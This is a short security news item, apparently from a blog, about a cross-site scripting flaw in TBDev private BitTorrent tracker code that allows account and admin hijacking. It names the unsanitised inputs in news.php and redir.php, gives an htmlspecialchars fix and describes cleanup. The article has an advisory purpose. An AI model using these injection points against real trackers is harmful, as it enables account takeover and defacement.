Serious Vulnerability In Private BitTorrent Trackers
Thousands of private BitTorrent trackers using the popular TBDev code are vulnerable to hostile takeover. According to a security researcher, a successful execution of the exploit could result in the attacker gaining admin rights to the tracker. However, knowledge and a little care can mitigate the effects. This particular TBDev exploit is down to the fact the developers didn’t protect the administrative interface from Cross Site Scripting attacks (XSS).
The popular TBDev code on which thousands of private BitTorrent trackers are built, is said to be vulnerable to a major exploit. A successful attack could allow a malicious attacker to deface the main tracker page (index.php) and hijack the account of anyone who logs into the application. It’s even possible to hijack an administrator’s account by using a social engineering attack to get them to click on specially crafted hyperlink, although most admins won’t be tricked by this method. If you visit a website that the hacker controls then he can also trigger the attack. If you think you might have clicked on a bad link, change your password immediately.
To avoid this exploit, the most important thing to keep in mind is do not click on suspicious links. The link can be easily modified to be shorter, but the important part is avoiding links to TBDev’s /redir.php.
To remove the persistent XSS payload the administrator might have to login to the SQL server manually and delete the offending entry in the “news” table, since they won’t be able to use the web application to delete the news posting.
A very quick fix for this issue would be changing in news.php from “$body = $_POST[“body”];” to “$body = htmlspecialchars($_POST[“body”],ENT_QUOTES);”
The same fix also needs to be applied to $_GET[“url”] in redir.php or the administrator account as well as others are subjected to hijack. There are other security problems with this application, but the XSS is the most serious as it leads to immediate attack.
The full details of the exploit are available in here.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.